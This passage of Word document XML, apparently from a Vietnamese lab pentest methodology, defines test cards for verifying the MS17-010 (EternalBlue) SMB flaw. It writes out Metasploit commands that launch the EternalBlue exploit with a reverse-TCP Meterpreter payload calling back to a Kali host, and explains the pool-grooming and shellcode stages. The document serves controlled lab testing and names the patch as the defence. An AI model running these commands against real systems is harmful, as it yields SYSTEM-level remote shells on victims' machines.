        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Failure Criterion:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Console hiển thị thông báo hệ thống không tồn tại lỗ hổng hoặc đã được vá: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[-] 192.168.10.20:445 - Host does NOT appear vulnerable</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BAE249" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Output / Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dòng log xác nhận của module phụ trợ, đóng vai trò bằng chứng độc lập thứ hai đối chiếu với kết quả Nmap NSE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6787E9E7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Inference Boundary:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Củng cố bằng chứng ở Cấp độ 3. Không cấu thành bằng chứng khai thác thành công ở Cấp độ 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64252586" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Limitation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Phụ thuộc vào tính ổn định của thư viện Ruby SMB client trong framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001D6106" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Defense Breakpoint:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bị bẻ gãy khi cài đặt bản vá KB4012212 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>V = \text{False}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_1</w:t>
      </w:r>
      <w:r>
        <w:t>) hoặc tắt SMBv1 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>D = \text{False}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_2</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021FC068" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>2.4.5. Kỹ thuật 5: Xác minh mức độ tác động có kiểm soát bằng Metasploit Exploit Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1725031E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Input:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Module </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> với cấu hình tham số kiểm soát an toàn:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8784"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="3B9614DA" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8784" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
          </w:tcPr>
          <w:p w14:paraId="01F553A2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   set RHOSTS 192.168.10.20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">   set PAYLOAD windows/x64/meterpreter/reverse_tcp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">   set LHOST 192.168.20.10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">   set LPORT 4444</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">   set MaxExploitAttempts 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">   exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07AACABA" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619"/>
    <w:p w14:paraId="3E2FF3FF" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Ý nghĩa tham số an toàn:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Khác với khai thác phần mềm ở không gian người dùng (User-mode), EternalBlue can thiệp trực tiếp vào cấu trúc Non-Paged Pool của nhân hệ điều hành [3], [5]. Thao tác sắp xếp bộ nhớ (Pool Grooming) đòi hỏi tính liên tục về địa chỉ. Nếu lần khai thác đầu tiên không thành công (do phân mảnh bộ nhớ thực tế hoặc con trỏ bị trượt), việc để module tự động thử lại nhiều lần (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MaxExploitAttempts &gt; 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) sẽ liên tục ghi đè vào các khối pool kế cận, dẫn đến hỏng cấu trúc danh sách liên kết (Corrupted Pool Header) và gần như chắc chắn gây sập hệ thống (BSOD mã </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0x00000019</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0x00000050</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Cấu hình </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>set MaxExploitAttempts 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bảo đảm kỷ luật kiểm thử an toàn: chỉ thực thi đúng một lần duy nhất; nếu không đạt kết quả mong muốn, dừng ngay để kích hoạt quy trình Rollback snapshot sạch, bảo toàn tính xác định của môi trường thực nghiệm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B060D7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Preconditions:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Toàn bộ chuỗi tiền điều kiện </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>R \land S \land D \land V = \text{True}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; trạm Pentest mở cổng lắng nghe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sẵn sàng tiếp nhận kết nối ngược; và chính sách Tường lửa cho phép lưu lượng TCP từ máy chủ mục tiêu (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.10.20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) kết nối ngược ra cổng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> của trạm Kali (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.20.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) nhằm kiểm chứng kênh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198004D4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Internal Mechanism:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Module thực thi kỹ thuật khai thác qua ba giai đoạn phức tạp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4601FF" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Giai đoạn 1 (Kích hoạt lỗi FEA):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Gửi các gói tin SMBv1 cấu trúc sai lệch để kích hoạt lỗi chuyển đổi kích thước danh sách FEA trong hàm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SrvOs2FeaListSizeToNt</w:t>
      </w:r>
      <w:r>
        <w:t>, tạo điều kiện ghi ngoài biên bộ đệm được cấp phát [3], [5].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC76A55" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Giai đoạn 2 (Bố trí vùng nhớ Non-Paged Pool - Pool Grooming):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Gửi liên tiếp nhiều gói tin tạo kết nối SMB nhằm chiếm các vùng nhớ trống (holes) liền kề nhau trong Non-Paged Pool, định vị đối tượng mục tiêu cần ghi đè ngay sau bộ đệm bị tràn [3], [5].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C46F86C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Giai đoạn 3 (Ghi đè cấu trúc điều khiển và thực thi Shellcode):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kích hoạt tràn bộ nhớ, ghi đè con trỏ hàm trong cấu trúc điều khiển của driver kernel để chuyển hướng luồng thực thi CPU sang vùng nhớ chứa shellcode. Shellcode thực thi với đặc quyền cao nhất của hệ điều hành (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), tiêm </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">mã độc vào tiến trình hệ thống (như </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>spoolsv.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>lsass.exe</w:t>
      </w:r>
      <w:r>
        <w:t>) và khởi tạo kết nối TCP ngược về máy Kali Linux qua cổng 4444 [5], [6].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B53441" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Observation Point:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cửa sổ dòng lệnh Metasploit; danh sách tiến trình trên máy mục tiêu; bản tin TCP kết nối ngược trên Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A28678" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Success Criterion (Chỉ áp dụng để công nhận Cấp độ 4 PASS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510D6FCD" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:t>Thiết lập thành công phiên tương tác Meterpreter (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Meterpreter session 1 opened</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B86ECE2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Thực thi thành công lệnh kiểm tra quyền hạn trả về chuỗi định danh: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>\to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523A52AC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Thu thập được bằng chứng thực thi lệnh hệ điều hành thành công trong phiên tương tác (ví dụ: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ipconfig</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22826FA5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Failure Criterion (Nhận diện thất bại và phân định lỗi sập hệ thống):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0101DAA5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Trường hợp thất bại an toàn (Safe Fail):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Module thông báo lỗi kết nối, bị từ chối hoặc khai thác không thành công nhưng hệ điều hành mục tiêu vẫn duy trì hoạt động bình thường (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Exploit completed, but no session was created</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2DAD47" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Trường hợp lỗi dừng hệ thống (Kernel Crash / BSOD):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Máy mục tiêu xuất hiện màn hình xanh dừng hệ thống (Bug Check mã </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0x00000050</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0x000000C5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) và tự động khởi động lại, dịch vụ SMB bị gián đoạn. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Trường hợp này không được tính là khai thác thành công (Exploit Success), mà phải được phân loại chính xác là `EXPLOIT_FAILED (KERNEL_INSTABILITY / CRASH)` tương ứng tiền điều kiện $E = \text{False}$</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565D659E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Output / Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Log phiên làm việc Metasploit; mã định danh tiến trình mục tiêu (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PID</w:t>
      </w:r>
      <w:r>
        <w:t>); lưu lượng TCP bắt tay trên cổng 4444 trong tệp pcap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5810481F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Inference Boundary:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Chứng minh cấu hình tại trạng thái kiểm thử có thể bị kiểm soát toàn diện ở mức nhân (đạt Cấp độ 4). Không được suy diễn kết quả này áp dụng cho mọi hệ điều hành Windows khác nếu không qua kiểm chứng pool grooming tương ứng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ABB26B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Limitation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tỷ lệ thành công của pool grooming chịu ảnh hưởng bởi mức độ phân mảnh bộ nhớ thực tế tại thời điểm khai thác.</w:t>
      </w:r>
    </w:p>
